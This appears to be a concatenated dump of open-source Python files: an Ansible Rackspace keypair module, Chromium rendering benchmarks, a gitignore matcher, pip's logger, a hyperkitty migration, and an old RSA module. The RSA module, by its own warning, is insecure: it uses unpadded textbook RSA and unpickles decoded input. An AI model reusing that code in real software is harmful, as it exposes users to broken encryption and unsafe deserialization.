module: copy
content: "{{ keypair.keypair.private_key }}"
dest: "{{ inventory_dir }}/{{ keypair.keypair.name }}"
- name: Create a keypair
hosts: localhost
gather_facts: False
tasks:
- name: keypair request
local_action:
module: rax_keypair
credentials: ~/.raxpub
name: my_keypair
public_key: "{{ lookup('file', 'authorized_keys/id_rsa.pub') }}"
region: DFW
register: keypair
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def rax_keypair(module, name, public_key, state):
changed = False
cs = pyrax.cloudservers
if cs is None:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
keypair = {}
if state == 'present':
if public_key and os.path.isfile(public_key):
try:
f = open(public_key)
public_key = f.read()
f.close()
except Exception, e:
module.fail_json(msg='Failed to load %s' % public_key)
try:
keypair = cs.keypairs.find(name=name)
except cs.exceptions.NotFound:
try:
keypair = cs.keypairs.create(name, public_key)
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
except Exception, e:
module.fail_json(msg='%s' % e.message)
elif state == 'absent':
try:
keypair = cs.keypairs.find(name=name)
except:
pass
if keypair:
try:
keypair.delete()
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
module.exit_json(changed=changed, keypair=rax_to_dict(keypair))
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
name=dict(required=True),
public_key=dict(),
state=dict(default='present', choices=['absent', 'present']),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together(),
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
name = module.params.get('name')
public_key = module.params.get('public_key')
state = module.params.get('state')
setup_rax_module(module, pyrax)
rax_keypair(module, name, public_key, state)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
### invoke the module
main()
|
gpl-3.0
|
ltilve/chromium
|
tools/perf/benchmarks/smoothness.py
|
1
|
9502
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry import benchmark
from benchmarks import silk_flags
from benchmarks import webgl_expectations
from measurements import smoothness
import page_sets
class SmoothnessTop25(benchmark.Benchmark):
"""Measures rendering statistics while scrolling down the top 25 web pages.
http://www.chromium.org/developers/design-documents/rendering-benchmarks
"""
test = smoothness.Smoothness
page_set = page_sets.Top25SmoothPageSet
@classmethod
def Name(cls):
return 'smoothness.top_25_smooth'
class SmoothnessToughFiltersCases(benchmark.Benchmark):
"""Measures frame rate and a variety of other statistics.
Uses a selection of pages making use of SVG and CSS Filter Effects.
"""
test = smoothness.Smoothness
page_set = page_sets.ToughFiltersCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_filters_cases'
# crbug.com/388877, crbug.com/396127
@benchmark.Disabled('mac', 'win', 'android')
class SmoothnessToughCanvasCases(benchmark.Benchmark):
"""Measures frame rate and a variety of other statistics.
Uses a selection of pages making use of the 2D Canvas API.
"""
test = smoothness.Smoothness
page_set = page_sets.ToughCanvasCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_canvas_cases'
@benchmark.Disabled('android') # crbug.com/373812
class SmoothnessToughWebGLCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.ToughWebglCasesPageSet
@classmethod
def CreateExpectations(cls):
return webgl_expectations.WebGLExpectations()
@classmethod
def Name(cls):
return 'smoothness.tough_webgl_cases'
@benchmark.Enabled('android')
class SmoothnessMaps(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.MapsPageSet
@classmethod
def CreateExpectations(cls):
return webgl_expectations.MapsExpectations()
@classmethod
def Name(cls):
return 'smoothness.maps'
@benchmark.Disabled('android')
class SmoothnessKeyDesktopMoveCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.KeyDesktopMoveCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.key_desktop_move_cases'
@benchmark.Enabled('android')
class SmoothnessKeyMobileSites(benchmark.Benchmark):
"""Measures rendering statistics while scrolling down the key mobile sites.
http://www.chromium.org/developers/design-documents/rendering-benchmarks
"""
test = smoothness.Smoothness
page_set = page_sets.KeyMobileSitesSmoothPageSet
@classmethod
def Name(cls):
return 'smoothness.key_mobile_sites_smooth'
class SmoothnessToughAnimationCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.ToughAnimationCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_animation_cases'
@benchmark.Enabled('android')
class SmoothnessKeySilkCases(benchmark.Benchmark):
"""Measures rendering statistics for the key silk cases without GPU
rasterization.
"""
test = smoothness.Smoothness
page_set = page_sets.KeySilkCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.key_silk_cases'
@benchmark.Enabled('android')
class SmoothnessGpuRasterizationTop25(benchmark.Benchmark):
"""Measures rendering statistics for the top 25 with GPU rasterization.
"""
tag = 'gpu_rasterization'
test = smoothness.Smoothness
page_set = page_sets.Top25SmoothPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization.top_25_smooth'
@benchmark.Enabled('android')
class SmoothnessGpuRasterizationKeyMobileSites(benchmark.Benchmark):
"""Measures rendering statistics for the key mobile sites with GPU
rasterization.
"""
tag = 'gpu_rasterization'
test = smoothness.Smoothness
page_set = page_sets.KeyMobileSitesSmoothPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization.key_mobile_sites_smooth'
@benchmark.Enabled('android')
class SmoothnessSyncScrollKeyMobileSites(benchmark.Benchmark):
"""Measures rendering statistics for the key mobile sites with synchronous
(main thread) scrolling.
"""
tag = 'sync_scroll'
test = smoothness.Smoothness
page_set = page_sets.KeyMobileSitesSmoothPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForSyncScrolling(options)
@classmethod
def Name(cls):
return 'smoothness.sync_scroll.key_mobile_sites_smooth'
@benchmark.Enabled('android')
class SmoothnessSimpleMobilePages(benchmark.Benchmark):
"""Measures rendering statistics for simple mobile sites page set.
"""
test = smoothness.Smoothness
page_set = page_sets.SimpleMobileSitesPageSet
@classmethod
def Name(cls):
return 'smoothness.simple_mobile_sites'
@benchmark.Enabled('android')
class SmoothnessFlingSimpleMobilePages(benchmark.Benchmark):
"""Measures rendering statistics for flinging a simple mobile sites page set.
"""
test = smoothness.Smoothness
page_set = page_sets.SimpleMobileSitesFlingPageSet
def CustomizeBrowserOptions(self, options):
# As the fling parameters cannot be analytically determined to not
# overscroll, disable overscrolling explicitly. Overscroll behavior is
# orthogonal to fling performance, and its activation is only more noise.
options.AppendExtraBrowserArgs('--disable-overscroll-edge-effect')
@classmethod
def Name(cls):
return 'smoothness.fling.simple_mobile_sites'
@benchmark.Enabled('android', 'chromeos')
class SmoothnessToughPinchZoomCases(benchmark.Benchmark):
"""Measures rendering statistics for pinch-zooming into the tough pinch zoom
cases.
"""
test = smoothness.Smoothness
page_set = page_sets.ToughPinchZoomCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_pinch_zoom_cases'
@benchmark.Enabled('chromeos')
class SmoothnessToughScrollingWhileZoomedInCases(benchmark.Benchmark):
"""Measures rendering statistics for pinch-zooming then diagonal scrolling"""
test = smoothness.Smoothness
page_set = page_sets.ToughScrollingWhileZoomedInCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_scrolling_while_zoomed_in_cases'
@benchmark.Enabled('android')
class SmoothnessPolymer(benchmark.Benchmark):
"""Measures rendering statistics for Polymer cases.
"""
test = smoothness.Smoothness
page_set = page_sets.PolymerPageSet
@classmethod
def Name(cls):
return 'smoothness.polymer'
@benchmark.Enabled('android')
class SmoothnessGpuRasterizationPolymer(benchmark.Benchmark):
"""Measures rendering statistics for the Polymer cases with GPU rasterization.
"""
tag = 'gpu_rasterization'
test = smoothness.Smoothness
page_set = page_sets.PolymerPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization.polymer'
class SmoothnessToughFastScrollingCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.ToughScrollingCasesPageSet
options = {'story_label_filter': 'fastscrolling'}
@classmethod
def Name(cls):
return 'smoothness.tough_scrolling_cases'
class SmoothnessImageDecodingCases(benchmark.Benchmark):
"""Measures decoding statistics for jpeg images.
"""
test = smoothness.Smoothness
page_set = page_sets.ImageDecodingCasesPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
options.AppendExtraBrowserArgs('--disable-accelerated-jpeg-decoding')
@classmethod
def Name(cls):
return 'smoothness.image_decoding_cases'
class SmoothnessGpuImageDecodingCases(benchmark.Benchmark):
"""Measures decoding statistics for jpeg images with GPU rasterization.
"""
tag = 'gpu_rasterization_and_decoding'
test = smoothness.Smoothness
page_set = page_sets.ImageDecodingCasesPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
# TODO(sugoi): Remove the following line once M41 goes stable
options.AppendExtraBrowserArgs('--enable-accelerated-jpeg-decoding')
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization_and_decoding.image_decoding_cases'
@benchmark.Enabled('android')
class SmoothnessPathologicalMobileSites(benchmark.Benchmark):
"""Measures task execution statistics while scrolling pathological sites.
"""
test = smoothness.Smoothness
page_set = page_sets.PathologicalMobileSitesPageSet
@classmethod
def Name(cls):
return 'smoothness.pathological_mobile_sites'
@benchmark.Enabled('android')
class SmoothnessSyncScrollPathologicalMobileSites(benchmark.Benchmark):
"""Measures task execution statistics while sync-scrolling pathological sites.
"""
tag = 'sync_scroll'
test = smoothness.Smoothness
page_set = page_sets.PathologicalMobileSitesPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForSyncScrolling(options)
@classmethod
def Name(cls):
return 'smoothness.sync_scroll.pathological_mobile_sites'
|
bsd-3-clause
|
omakk/servo
|
tests/wpt/web-platform-tests/tools/gitignore/gitignore.py
|
90
|
3939
|
import itertools
import re
import os
end_space = re.compile(r"([^\\]\s)*$")
def fnmatch_translate(pat, path_name=False):
parts = []
seq = False
i = 0
if pat[0] == "/" or path_name:
parts.append("^")
any_char = "[^/]"
if pat[0] == "/":
pat = pat[1:]
else:
any_char = "."
parts.append("^(?:.*/)?")
while i < len(pat):
c = pat[i]
if c == "\\":
if i < len(pat) - 1:
i += 1
c = pat[i]
parts.append(re.escape(c))
else:
raise ValueError
elif seq:
if c == "]":
seq = False
# First two cases are to deal with the case where / is the only character
# in the sequence but path_name is True so it shouldn't match anything
if parts[-1] == "[":
parts = parts[:-1]
elif parts[-1] == "^" and parts[-2] == "[":
parts = parts[:-2]
else:
parts.append(c)
elif c == "-":
parts.append(c)
elif not (path_name and c == "/"):
parts += re.escape(c)
elif c == "[":
parts.append("[")
if i < len(pat) - 1 and pat[i+1] in ("!", "^"):
parts.append("^")
i += 1
seq = True
elif c == "*":
if i < len(pat) - 1 and pat[i+1] == "*":
parts.append(any_char + "*")
i += 1
if i < len(pat) - 1 and pat[i+1] == "*":
raise ValueError
else:
parts.append(any_char + "*")
elif c == "?":
parts.append(any_char)
else:
parts.append(re.escape(c))
i += 1
if seq:
raise ValueError
parts.append("$")
try:
return re.compile("".join(parts))
except:
raise
def parse_line(line):
line = line.rstrip()
if not line or line[0] == "#":
return
invert = line[0] == "!"
if invert:
line = line[1:]
dir_only = line[-1] == "/"
if dir_only:
line = line[:-1]
return invert, dir_only, fnmatch_translate(line, "/" in line)
class PathFilter(object):
def __init__(self, root, extras=None):
if root:
ignore_path = os.path.join(root, ".gitignore")
else:
ignore_path = None
if not ignore_path and not extras:
self.trivial = True
return
self.trivial = False
self.rules_file = []
self.rules_dir = []
if extras is None:
extras = []
if ignore_path and os.path.exists(ignore_path):
self._read_ignore(ignore_path)
for item in extras:
self._read_line(item)
def _read_ignore(self, ignore_path):
with open(ignore_path) as f:
for line in f:
self._read_line(line)
def _read_line(self, line):
parsed = parse_line(line)
if not parsed:
return
invert, dir_only, regexp = parsed
if dir_only:
self.rules_dir.append((regexp, invert))
else:
self.rules_file.append((regexp, invert))
def __call__(self, path):
if os.path.sep != "/":
path = path.replace(os.path.sep, "/")
if self.trivial:
return True
path_is_dir = path[-1] == "/"
if path_is_dir:
path = path[:-1]
rules = self.rules_dir
else:
rules = self.rules_file
include = True
for regexp, invert in rules:
if not include and invert and regexp.match(path):
include = True
elif include and not invert and regexp.match(path):
include = False
return include
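if __name__ == "__main__":
    # Editor's sketch: filtering paths with ad-hoc rules instead of a
    # .gitignore on disk (root=None, rules supplied via `extras`).
    # The filter returns True when a path should be kept.
    path_filter = PathFilter(None, extras=["*.pyc", "build/"])
    print(path_filter("src/module.pyc"))   # False: excluded by *.pyc
    print(path_filter("build/"))           # False: excluded by the dir rule
    print(path_filter("src/module.py"))    # True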
|
mpl-2.0
|
ByteMail/ByteMail
|
rsa/_version133.py
|
177
|
11274
|
"""RSA module
pri = k[1] //Private part of keys d,p,q
Module for calculating large primes, and RSA encryption, decryption,
signing and verification. Includes generating public and private keys.
WARNING: this code implements the mathematics of RSA. It is not suitable for
real-world secure cryptography purposes. It has not been reviewed by a security
expert. It does not include padding of data. There are many ways in which the
output of this module, when used without any modification, can be successfully
attacked.
"""
__author__ = "Sybren Stuvel, Marloes de Boer and Ivo Tamboer"
__date__ = "2010-02-05"
__version__ = '1.3.3'
# NOTE: Python's modulo can return negative numbers. We compensate for
# this behaviour using the abs() function
from cPickle import dumps, loads
import base64
import math
import os
import random
import sys
import types
import zlib
from rsa._compat import byte
# Display a warning that this insecure version is imported.
import warnings
warnings.warn('Insecure version of the RSA module is imported as %s, be careful'
% __name__)
def gcd(p, q):
"""Returns the greatest common divisor of p and q
>>> gcd(42, 6)
6
"""
if p<q: return gcd(q, p)
if q == 0: return p
return gcd(q, abs(p%q))
def bytes2int(bytes):
"""Converts a list of bytes or a string to an integer
>>> (128*256 + 64)*256 + 15
8405007
>>> l = [128, 64, 15]
>>> bytes2int(l)
8405007
"""
if not (type(bytes) is types.ListType or type(bytes) is types.StringType):
raise TypeError("You must pass a string or a list")
# Convert byte stream to integer
integer = 0
for byte in bytes:
integer *= 256
if type(byte) is types.StringType: byte = ord(byte)
integer += byte
return integer
def int2bytes(number):
"""Converts a number to a string of bytes
>>> bytes2int(int2bytes(123456789))
123456789
"""
if not (type(number) is types.LongType or type(number) is types.IntType):
raise TypeError("You must pass a long or an int")
string = ""
while number > 0:
string = "%s%s" % (byte(number & 0xFF), string)
number /= 256
return string
def fast_exponentiation(a, p, n):
"""Calculates r = a^p mod n
"""
result = a % n
remainders = []
while p != 1:
remainders.append(p & 1)
p = p >> 1
while remainders:
rem = remainders.pop()
result = ((a ** rem) * result ** 2) % n
return result
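# Editor's check (doctest-style, not in the original): square-and-multiply
# agrees with the naive computation, e.g.
#
#   >>> fast_exponentiation(4, 13, 497)
#   445
#   >>> (4 ** 13) % 497
#   445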
def read_random_int(nbits):
"""Reads a random integer of approximately nbits bits rounded up
to whole bytes"""
nbytes = ceil(nbits/8.)
randomdata = os.urandom(nbytes)
return bytes2int(randomdata)
def ceil(x):
"""ceil(x) -> int(math.ceil(x))"""
return int(math.ceil(x))
def randint(minvalue, maxvalue):
"""Returns a random integer x with minvalue <= x <= maxvalue"""
# Safety - get a lot of random data even if the range is fairly
# small
min_nbits = 32
# The range of the random numbers we need to generate
range = maxvalue - minvalue
# Which is this number of bytes
rangebytes = ceil(math.log(range, 2) / 8.)
# Convert to bits, but make sure it's always at least min_nbits*2
rangebits = max(rangebytes * 8, min_nbits * 2)
# Take a random number of bits between min_nbits and rangebits
nbits = random.randint(min_nbits, rangebits)
return (read_random_int(nbits) % range) + minvalue
def fermat_little_theorem(p):
"""Returns 1 if p may be prime, and something else if p definitely
is not prime"""
a = randint(1, p-1)
return fast_exponentiation(a, p-1, p)
def jacobi(a, b):
"""Calculates the value of the Jacobi symbol (a/b)
"""
if a % b == 0:
return 0
result = 1
while a > 1:
if a & 1:
if ((a-1)*(b-1) >> 2) & 1:
result = -result
b, a = a, b % a
else:
if ((b ** 2 - 1) >> 3) & 1:
result = -result
a = a >> 1
return result
def jacobi_witness(x, n):
"""Returns False if n is an Euler pseudo-prime with base x, and
True otherwise.
"""
j = jacobi(x, n) % n
f = fast_exponentiation(x, (n-1)/2, n)
if j == f: return False
return True
def randomized_primality_testing(n, k):
"""Calculates whether n is composite (which is always correct) or
prime (which is incorrect with error probability 2**-k)
Returns False if the number is composite, and True if it's
probably prime.
"""
q = 0.5 # Property of the jacobi_witness function
# t = int(math.ceil(k / math.log(1/q, 2)))
t = ceil(k / math.log(1/q, 2))
for i in range(t+1):
x = randint(1, n-1)
if jacobi_witness(x, n): return False
return True
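# Worked example of the error bound above (illustrative, not part of the original module):
# with q = 0.5 and k = 5, t = ceil(5 / log2(1/0.5)) = ceil(5 / 1) = 5, so the loop above
# draws up to range(t + 1) = 6 random witnesses before declaring the number probably prime.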
def is_prime(number):
"""Returns True if the number is prime, and False otherwise.
>>> is_prime(42)
0
>>> is_prime(41)
1
"""
"""
if not fermat_little_theorem(number) == 1:
# Not prime, according to Fermat's little theorem
return False
"""
if randomized_primality_testing(number, 5):
# Prime, according to Jacobi
return True
# Not prime
return False
def getprime(nbits):
"""Returns a prime number of max. 'math.ceil(nbits/8)*8' bits. In
other words: nbits is rounded up to whole bytes.
>>> p = getprime(8)
>>> is_prime(p-1)
0
>>> is_prime(p)
1
>>> is_prime(p+1)
0
"""
nbytes = int(math.ceil(nbits/8.))
while True:
integer = read_random_int(nbits)
# Make sure it's odd
integer |= 1
# Test for primeness
if is_prime(integer): break
# Retry if not prime
return integer
def are_relatively_prime(a, b):
"""Returns True if a and b are relatively prime, and False if they
are not.
>>> are_relatively_prime(2, 3)
1
>>> are_relatively_prime(2, 4)
0
"""
d = gcd(a, b)
return (d == 1)
def find_p_q(nbits):
"""Returns a tuple of two different primes of nbits bits"""
p = getprime(nbits)
while True:
q = getprime(nbits)
if not q == p: break
return (p, q)
def extended_euclid_gcd(a, b):
"""Returns a tuple (d, i, j) such that d = gcd(a, b) = ia + jb
"""
if b == 0:
return (a, 1, 0)
q = abs(a % b)
r = long(a / b)
(d, k, l) = extended_euclid_gcd(b, q)
return (d, l, k - l*r)
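# Worked example (illustrative, not part of the original module):
#     extended_euclid_gcd(7, 3) == (1, 1, -2), since 1 = 1*7 + (-2)*3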
# Main function: calculate encryption and decryption keys
def calculate_keys(p, q, nbits):
"""Calculates an encryption and a decryption key for p and q, and
returns them as a tuple (e, d)"""
n = p * q
phi_n = (p-1) * (q-1)
while True:
# Make sure e has enough bits so we ensure "wrapping" through
# modulo n
e = getprime(max(8, nbits/2))
if are_relatively_prime(e, n) and are_relatively_prime(e, phi_n): break
(d, i, j) = extended_euclid_gcd(e, phi_n)
if not d == 1:
raise Exception("e (%d) and phi_n (%d) are not relatively prime" % (e, phi_n))
if not (e * i) % phi_n == 1:
raise Exception("e (%d) and i (%d) are not mult. inv. modulo phi_n (%d)" % (e, i, phi_n))
return (e, i)
def gen_keys(nbits):
"""Generate RSA keys of nbits bits. Returns (p, q, e, d).
Note: this can take a long time, depending on the key size.
"""
while True:
(p, q) = find_p_q(nbits)
(e, d) = calculate_keys(p, q, nbits)
# For some reason, d is sometimes negative. We don't know how
# to fix it (yet), so we keep trying until everything is shiny
if d > 0: break
return (p, q, e, d)
def gen_pubpriv_keys(nbits):
"""Generates public and private keys, and returns them as (pub,
priv).
The public key consists of a dict {'e': ..., 'n': ...}. The private
key consists of a dict {'d': ..., 'p': ..., 'q': ...}.
"""
(p, q, e, d) = gen_keys(nbits)
return ( {'e': e, 'n': p*q}, {'d': d, 'p': p, 'q': q} )
def encrypt_int(message, ekey, n):
"""Encrypts a message using encryption key 'ekey', working modulo
n"""
if type(message) is types.IntType:
return encrypt_int(long(message), ekey, n)
if not type(message) is types.LongType:
raise TypeError("You must pass a long or an int")
if message > 0 and \
math.floor(math.log(message, 2)) > math.floor(math.log(n, 2)):
raise OverflowError("The message is too long")
return fast_exponentiation(message, ekey, n)
def decrypt_int(cyphertext, dkey, n):
"""Decrypts a cypher text using the decryption key 'dkey', working
modulo n"""
return encrypt_int(cyphertext, dkey, n)
def sign_int(message, dkey, n):
"""Signs 'message' using key 'dkey', working modulo n"""
return decrypt_int(message, dkey, n)
def verify_int(signed, ekey, n):
"""verifies 'signed' using key 'ekey', working modulo n"""
return encrypt_int(signed, ekey, n)
def picklechops(chops):
"""Pickles and base64encodes it's argument chops"""
value = zlib.compress(dumps(chops))
encoded = base64.encodestring(value)
return encoded.strip()
def unpicklechops(string):
"""base64decodes and unpickes it's argument string into chops"""
return loads(zlib.decompress(base64.decodestring(string)))
def chopstring(message, key, n, funcref):
"""Splits 'message' into chops that are at most as long as n,
converts these into integers, and calls funcref(integer, key, n)
for each chop.
Used by 'encrypt' and 'sign'.
"""
msglen = len(message)
mbits = msglen * 8
nbits = int(math.floor(math.log(n, 2)))
nbytes = nbits / 8
blocks = msglen / nbytes
if msglen % nbytes > 0:
blocks += 1
cypher = []
for bindex in range(blocks):
offset = bindex * nbytes
block = message[offset:offset+nbytes]
value = bytes2int(block)
cypher.append(funcref(value, key, n))
return picklechops(cypher)
def gluechops(chops, key, n, funcref):
"""Glues chops back together into a string. calls
funcref(integer, key, n) for each chop.
Used by 'decrypt' and 'verify'.
"""
message = ""
chops = unpicklechops(chops)
for cpart in chops:
mpart = funcref(cpart, key, n)
message += int2bytes(mpart)
return message
def encrypt(message, key):
"""Encrypts a string 'message' with the public key 'key'"""
return chopstring(message, key['e'], key['n'], encrypt_int)
def sign(message, key):
"""Signs a string 'message' with the private key 'key'"""
return chopstring(message, key['d'], key['p']*key['q'], decrypt_int)
def decrypt(cypher, key):
"""Decrypts a cypher with the private key 'key'"""
return gluechops(cypher, key['d'], key['p']*key['q'], decrypt_int)
def verify(cypher, key):
"""Verifies a cypher with the public key 'key'"""
return gluechops(cypher, key['e'], key['n'], encrypt_int)
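# A minimal usage sketch of the public API above (illustrative only; as the module docstring
# warns, this code is not suitable for real-world cryptography):
#     (pub, priv) = gen_pubpriv_keys(64)
#     assert decrypt(encrypt('hello', pub), priv) == 'hello'
#     assert verify(sign('hello', priv), pub) == 'hello'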
# Do doctest if we're not imported
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["gen_pubpriv_keys", "encrypt", "decrypt", "sign", "verify"]
|
mit
|
cjaffar/jaffarchiosa
|
jaffarchiosa/lib/python2.7/site-packages/pip/log.py
|
47
|
9438
|
"""Logging
"""
import sys
import os
import logging
from pip import backwardcompat
import colorama, pkg_resources
def _color_wrap(*colors):
def wrapped(inp):
return "".join(list(colors) + [inp, colorama.Style.RESET_ALL])
return wrapped
def should_color(consumer, environ, std=(sys.stdout, sys.stderr)):
real_consumer = (consumer if not isinstance(consumer, colorama.AnsiToWin32)
else consumer.wrapped)
# If consumer isn't stdout or stderr we shouldn't colorize it
if real_consumer not in std:
return False
# If consumer is a tty we should color it
if hasattr(real_consumer, "isatty") and real_consumer.isatty():
return True
# If we have an ANSI term we should color it
if environ.get("TERM") == "ANSI":
return True
# If anything else we should not color it
return False
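# Illustrative behaviour of should_color (not part of the original module):
#     should_color(sys.stdout, {"TERM": "ANSI"}) -> True, even when stdout is not a tty
#     should_color(open(os.devnull, "w"), {}) -> False, since the consumer is neither stdout nor stderr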
def should_warn(current_version, removal_version):
# We use two significant digits on versions, so remove everything but the
# first two places.
current_version = ".".join(current_version.split(".")[:2])
removal_version = ".".join(removal_version.split(".")[:2])
# Our warning threshold is one minor version before removal, so we
# decrement the minor version by one
major, minor = removal_version.split(".")
minor = str(int(minor) - 1)
warn_version = ".".join([major, minor])
# Test if our current_version should be a warn
return (pkg_resources.parse_version(current_version)
< pkg_resources.parse_version(warn_version))
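# Illustrative behaviour of should_warn (not part of the original module): with a
# removal_version of "1.7" the warning threshold is "1.6", so
#     should_warn("1.5", "1.7") -> True   (deprecated() logs a warning)
#     should_warn("1.6", "1.7") -> False  (deprecated() logs an error instead)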
class Logger(object):
"""
Logging object for use in command-line script. Allows ranges of
levels, to avoid some redundancy of displayed information.
"""
VERBOSE_DEBUG = logging.DEBUG - 1
DEBUG = logging.DEBUG
INFO = logging.INFO
NOTIFY = (logging.INFO + logging.WARN) / 2
WARN = WARNING = logging.WARN
ERROR = logging.ERROR
FATAL = logging.FATAL
LEVELS = [VERBOSE_DEBUG, DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]
COLORS = {
WARN: _color_wrap(colorama.Fore.YELLOW),
ERROR: _color_wrap(colorama.Fore.RED),
FATAL: _color_wrap(colorama.Fore.RED),
}
def __init__(self):
self.consumers = []
self.indent = 0
self.explicit_levels = False
self.in_progress = None
self.in_progress_hanging = False
def add_consumers(self, *consumers):
if sys.platform.startswith("win"):
for level, consumer in consumers:
if hasattr(consumer, "write"):
self.consumers.append(
(level, colorama.AnsiToWin32(consumer)),
)
else:
self.consumers.append((level, consumer))
else:
self.consumers.extend(consumers)
def debug(self, msg, *args, **kw):
self.log(self.DEBUG, msg, *args, **kw)
def info(self, msg, *args, **kw):
self.log(self.INFO, msg, *args, **kw)
def notify(self, msg, *args, **kw):
self.log(self.NOTIFY, msg, *args, **kw)
def warn(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def error(self, msg, *args, **kw):
self.log(self.ERROR, msg, *args, **kw)
def fatal(self, msg, *args, **kw):
self.log(self.FATAL, msg, *args, **kw)
def deprecated(self, removal_version, msg, *args, **kwargs):
"""
Logs deprecation message which is log level WARN if the
``removal_version`` is > 1 minor release away and log level ERROR
otherwise.
removal_version should be the version that the deprecated feature is
expected to be removed in, so something that will not exist in
version 1.7, but will in 1.6 would have a removal_version of 1.7.
"""
from pip import __version__
if should_warn(__version__, removal_version):
self.warn(msg, *args, **kwargs)
else:
self.error(msg, *args, **kwargs)
def log(self, level, msg, *args, **kw):
if args:
if kw:
raise TypeError(
"You may give positional or keyword arguments, not both")
args = args or kw
# render
if args:
rendered = msg % args
else:
rendered = msg
rendered = ' ' * self.indent + rendered
if self.explicit_levels:
## FIXME: should this be a name, not a level number?
rendered = '%02i %s' % (level, rendered)
for consumer_level, consumer in self.consumers:
if self.level_matches(level, consumer_level):
if (self.in_progress_hanging
and consumer in (sys.stdout, sys.stderr)):
self.in_progress_hanging = False
sys.stdout.write('\n')
sys.stdout.flush()
if hasattr(consumer, 'write'):
write_content = rendered + '\n'
if should_color(consumer, os.environ):
# We are printing to stdout or stderr and it supports
# colors so render our text colored
colorizer = self.COLORS.get(level, lambda x: x)
write_content = colorizer(write_content)
consumer.write(write_content)
if hasattr(consumer, 'flush'):
consumer.flush()
else:
consumer(rendered)
def _show_progress(self):
"""Should we display download progress?"""
return (self.stdout_level_matches(self.NOTIFY) and sys.stdout.isatty())
def start_progress(self, msg):
assert not self.in_progress, (
"Tried to start_progress(%r) while in_progress %r"
% (msg, self.in_progress))
if self._show_progress():
sys.stdout.write(' ' * self.indent + msg)
sys.stdout.flush()
self.in_progress_hanging = True
else:
self.in_progress_hanging = False
self.in_progress = msg
self.last_message = None
def end_progress(self, msg='done.'):
assert self.in_progress, (
"Tried to end_progress without start_progress")
if self._show_progress():
if not self.in_progress_hanging:
# Some message has been printed out since start_progress
sys.stdout.write('...' + self.in_progress + msg + '\n')
sys.stdout.flush()
else:
# These erase any messages shown with show_progress (besides .'s)
logger.show_progress('')
logger.show_progress('')
sys.stdout.write(msg + '\n')
sys.stdout.flush()
self.in_progress = None
self.in_progress_hanging = False
def show_progress(self, message=None):
"""If we are in a progress scope, and no log messages have been
shown, write out another '.'"""
if self.in_progress_hanging:
if message is None:
sys.stdout.write('.')
sys.stdout.flush()
else:
if self.last_message:
padding = ' ' * max(0, len(self.last_message) - len(message))
else:
padding = ''
sys.stdout.write('\r%s%s%s%s' %
(' ' * self.indent, self.in_progress, message, padding))
sys.stdout.flush()
self.last_message = message
def stdout_level_matches(self, level):
"""Returns true if a message at this level will go to stdout"""
return self.level_matches(level, self._stdout_level())
def _stdout_level(self):
"""Returns the level that stdout runs at"""
for level, consumer in self.consumers:
if consumer is sys.stdout:
return level
return self.FATAL
def level_matches(self, level, consumer_level):
"""
>>> l = Logger()
>>> l.level_matches(3, 4)
False
>>> l.level_matches(3, 2)
True
>>> l.level_matches(slice(None, 3), 3)
False
>>> l.level_matches(slice(None, 3), 2)
True
>>> l.level_matches(slice(1, 3), 1)
True
>>> l.level_matches(slice(2, 3), 1)
False
"""
if isinstance(level, slice):
start, stop = level.start, level.stop
if start is not None and start > consumer_level:
return False
if stop is not None and stop <= consumer_level:
return False
return True
else:
return level >= consumer_level
@classmethod
def level_for_integer(cls, level):
levels = cls.LEVELS
if level < 0:
return levels[0]
if level >= len(levels):
return levels[-1]
return levels[level]
def move_stdout_to_stderr(self):
to_remove = []
to_add = []
for consumer_level, consumer in self.consumers:
if consumer == sys.stdout:
to_remove.append((consumer_level, consumer))
to_add.append((consumer_level, sys.stderr))
for item in to_remove:
self.consumers.remove(item)
self.consumers.extend(to_add)
logger = Logger()
|
mit
|
hyperkitty/hyperkitty
|
hyperkitty/south_migrations/0004_auto__add_index_email_in_reply_to.py
|
2
|
12212
|
# -*- coding: utf-8 -*-
# pylint: skip-file
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Email', fields ['in_reply_to']
